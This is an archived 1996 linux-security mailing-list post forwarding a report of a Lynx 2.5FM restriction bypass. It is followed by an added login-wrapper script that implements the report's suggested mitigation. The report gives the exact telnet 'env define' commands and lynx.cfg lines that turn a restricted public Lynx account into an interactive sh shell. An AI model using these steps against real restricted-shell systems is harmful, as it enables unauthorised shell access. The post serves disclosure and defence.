[1103] in linux-security and linux-alert archive


[linux-security] LYNX-DEV security problem with environment for lynx -restrictions=all (fwd)

daemon@ATHENA.MIT.EDU (Roscinante)
Tue Aug 27 22:06:39 1996

Date: Mon, 26 Aug 1996 09:36:14 -0400 (EDT)
From: Roscinante <rosc@fbn.globalent.net>
To: Linux-security <linux-security@tarsier.cv.nrao.edu>


  This came in today on the lynx-dev list, thought it would be of interest to
linux security (not sure what OS this fellow is using, I sent a reply, and
told him about the 'fixed' telnet)

---------- Forwarded message ----------
Date: Sun, 25 Aug 1996 23:21:03 EDT
From: mhpower@MIT.EDU
Reply-To: lynx-dev@sig.net
To: lynx-dev@sig.net
Subject: LYNX-DEV security problem with environment for lynx -restrictions=all

In using Lynx 2.5FM (22 August version) from a public-login account
whose shell runs "lynx -restrictions=all", I've found it's possible to
defeat some restrictions and obtain interactive access to /bin/sh by
passing the environment variables WWW_HOME and LYNX_CFG via telnetd.

The attack will work on more system types if it's possible to write to
some filesystem that's mounted by the target machine. For example,

   % telnet
   telnet> env define WWW_HOME http://anyserver/anything.gif
   telnet> env define LYNX_CFG /afs/some.cell/users/myname/lynx.cfg
   telnet> open public-lynx-host -l lynx

where /afs/some.cell/users/myname/lynx.cfg contains

   SUFFIX:.gif:image/gif
   VIEWER:image/gif:sh

This gives me an sh shell on public-lynx-host with the uid of "lynx".

On some system types, it may instead be possible to do

   telnet> env define LYNX_CFG /dev/stdin

and type in the desired contents (e.g., the SUFFIX and VIEWER lines).

I'd suggest adding support for "-restrictions=env" which would prevent
lynx from modifying its behavior based on any call to getenv. Of
course, a public-login account might be better configured to
explicitly set WWW_HOME and LYNX_CFG (or use "-cfg=") before starting
lynx, but I think the risk of setup mistakes would be reduced if
ignoring the environment were supported within the lynx source code.

Matt


~~
 All that is gold does not glitter..                      .
 Not all those who wander are lost..J.R.R.T.        .     /\     .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ._____//  \\_____.
And the knowledge that they fear                 . \\    Rush    // .
is a weapon to be held against them.. N.P.       .   \\  2112  //   .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    .  //   /\   \\  .
Ghost in the Machine (wraith@styx.ios.com)        I[[[[[[[[]]]]]]]]I
Roscinante (rosc@fbn.globalent.net)
http://www.globalent.net/users/fbn
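
The mitigation suggested in the forwarded message (explicitly setting WWW_HOME and LYNX_CFG, and using "-cfg=", before starting lynx), written as a login-shell wrapper for the public account. This is an added example, not part of the original post or of the Lynx distribution; the script name lynx-login, the file paths, the start URL and the TERM filtering are assumptions.

```shell
#!/bin/sh
# Added example: login wrapper for a public "lynx" account.
# All paths, the script name and the start URL are assumptions.

# Accept only a plain terminal name from the client; anything else
# (empty, or containing characters outside A-Za-z0-9._-) becomes vt100.
safe_term() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) echo vt100 ;;
        *) echo "$1" ;;
    esac
}

# Start lynx with an emptied environment plus fixed values, so that
# WWW_HOME and LYNX_CFG passed in through telnetd never reach it.
# /usr/bin/env is called by absolute path because PATH may also be
# client-supplied at this point.
# usage: run_restricted_lynx <lynx-binary> <cfg-file> <start-url>
run_restricted_lynx() {
    exec /usr/bin/env -i \
        PATH=/usr/bin:/bin \
        TERM="$(safe_term "$TERM")" \
        WWW_HOME="$3" \
        LYNX_CFG="$2" \
        "$1" -cfg="$2" -restrictions=all "$3"
}

# Runs only when the file is installed as the account's login shell
# under this (assumed) name; sourcing it elsewhere just defines the functions.
case "$0" in
    */lynx-login)
        run_restricted_lynx /usr/local/bin/lynx \
            /usr/local/lib/lynx.cfg http://localhost/
        ;;
esac
```

The configuration file named here must be owned by root and not writable by the "lynx" uid, since its VIEWER lines decide which programs lynx will run.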
